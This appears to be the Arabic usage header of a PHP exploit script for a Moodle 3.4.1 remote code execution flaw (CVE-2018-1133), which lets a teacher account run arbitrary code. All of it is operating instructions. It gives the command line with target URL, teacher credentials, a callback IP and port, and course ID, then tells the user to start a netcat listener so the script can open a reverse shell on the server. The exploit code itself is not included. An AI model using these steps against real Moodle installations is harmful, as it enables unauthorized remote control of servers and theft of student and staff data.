
نودل [Moodle RCE] (الإصدار 3.4.1) - CVE-2018-1133
يمكن للمستخدم الذي يمتلك دور المعلم تنفيذ كود عشوائي.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user اسم المستخدم للحساب
pass كلمة مرور الحساب
ip عنوان IP للرد
port منفذ الرد
course معرف دورة صالح يتبع للمعلم
تأكد من تشغيل مستمع netcat على المنفذ المحدد قبل تنفيذ هذا البرنامج النصي.
nc -lnvp 1010
سيحاول هذا فتح شل عكسي لعنوان IP والمنفذ المستمع.
يعتمد هذا الاستغلال على معلومات مقدمة من Robin Peraglie.
قراءة إضافية: https://blog.ripstech.com/2018/moodle-remote-code-execution